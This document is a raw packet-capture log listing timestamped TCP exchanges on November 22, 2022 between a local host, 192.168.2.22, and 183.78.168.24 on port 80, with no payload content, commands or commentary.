                                                                                Nov 22, 2022 05:10:32.182032108 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.182156086 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.182207108 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.182226896 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.182324886 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.182384968 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.182436943 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.188894033 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.278413057 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.278515100 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.278561115 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.278600931 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.278644085 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.278660059 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.278718948 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.278729916 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.278769970 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.278821945 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.278862000 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.278933048 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.278990984 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.279079914 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.280916929 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.280961037 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.281004906 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.284831047 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.284873962 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.284996033 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.304975986 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.305021048 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.305145979 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.333273888 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.333354950 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.333386898 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.333445072 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.333492041 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.333554029 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.333616018 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.333612919 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.333612919 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.333656073 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.333712101 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.333719015 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.333762884 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.333904982 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.333962917 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.333978891 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.334007025 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.334067106 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.334074974 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.343158007 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.343245029 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.343286991 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.343355894 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.343393087 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.343399048 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.343457937 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.343472958 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.343523026 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.343564034 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.343588114 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.343699932 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.343763113 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.343805075 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.343820095 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.343924999 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.343966007 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.344026089 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.344124079 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.344137907 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.344249010 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.344306946 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.344310999 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.344392061 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.344494104 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.344552040 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.344552040 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.344696999 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.344753981 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.344810009 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.344851017 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.344912052 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.345055103 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.345112085 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.345117092 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.345227003 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.345303059 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.345359087 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.345410109 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.345513105 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.345624924 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.345676899 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.345681906 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.433114052 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.433209896 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.433250904 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.433310032 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.433353901 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.433356047 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.433423996 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.433459997 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.433465004 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.433494091 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.433514118 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.433603048 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.435214043 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.435272932 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.435337067 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.439001083 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.439135075 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.439196110 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.439198017 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.439238071 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.439292908 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.459412098 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.459475040 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.459619999 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.488162041 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.488221884 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.488261938 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.488326073 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.488333941 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.488385916 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.488406897 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.488449097 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.488495111 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.488512039 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.488564968 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.488622904 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.488624096 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.488667965 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.488722086 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.488806963 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.488854885 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.488914013 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.497668982 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.497762918 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.497823000 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.497828960 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.497864962 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.497922897 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.497924089 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.497987032 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.498029947 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.498044968 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.498089075 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.498145103 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.498212099 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.498347044 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.498403072 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.498404980 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.498505116 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.498562098 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.498563051 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.498686075 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.498749018 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.503559113 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.587627888 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.658005953 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.658067942 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.658132076 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.658190012 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.658195972 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.658196926 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.658231020 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.658292055 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.658294916 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.658355951 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.658397913 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.658422947 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.658442020 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.658495903 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.658502102 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.658649921 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.658690929 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.658700943 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.658749104 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.658798933 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.658847094 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.658971071 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.659027100 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.659090996 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.659131050 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.659182072 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.659224033 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.659348965 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.659396887 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.659496069 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.659558058 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.659596920 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.659607887 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.659660101 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.659708023 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.659712076 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.659843922 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.659898043 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.659938097 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.660029888 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.660082102 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.660186052 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.660228014 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.660276890 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.660326958 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.660387993 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.660438061 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.660536051 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.660598993 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.660640001 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.660649061 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.660753012 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.660794973 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.660801888 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.660849094 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.660942078 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.660949945 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.661036015 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.661086082 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.661158085 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.661261082 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.661313057 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.661313057 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.661371946 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.661421061 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.661509037 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.661640882 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.661698103 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.661700010 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.661817074 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.661859989 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.661865950 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.661952972 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.662003994 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.662111044 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.662168980 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.662209034 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.662218094 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.662307024 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.662357092 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.662427902 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.662574053 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.662625074 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.662627935 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.662669897 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.662718058 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.662765026 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.662856102 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.662902117 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.662971973 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.663012981 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.663062096 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.812830925 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.813005924 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.813071012 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.813129902 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.813170910 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.813185930 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.813185930 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.813226938 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.813263893 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.813266993 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.813328028 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.813369989 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.813376904 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.813427925 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.813469887 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.813486099 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.813538074 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.813591003 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.813591957 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.813633919 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.813678026 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:32.813781977 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.813823938 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:32.813864946 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:33.060121059 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:33.214646101 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.214730978 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.214797974 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.214858055 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.214920998 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:33.214957952 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.214983940 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:33.214999914 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.215050936 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:33.215055943 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.215101004 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.215157032 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.215193987 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:33.215203047 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.215254068 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.215323925 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:33.215344906 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.215389967 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.215460062 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:33.215528011 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.215574980 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.215607882 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:33.215679884 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.215744972 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:33.215749025 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.215791941 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.215864897 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:33.215886116 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.216012955 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.216082096 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:33.216156960 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.216197014 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.216264009 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:33.216310978 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.216351986 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.216404915 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:33.216463089 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.216502905 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.216556072 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:33.216646910 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.216687918 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.216738939 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:33.216742992 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.216918945 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.216959000 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.216974974 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:33.217047930 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.217098951 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:33.217147112 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.217271090 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.217327118 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:33.217329025 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.217372894 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.217422962 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:33.217494011 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.217554092 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.217622995 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:33.217633963 CET4918080192.168.2.22183.78.168.24
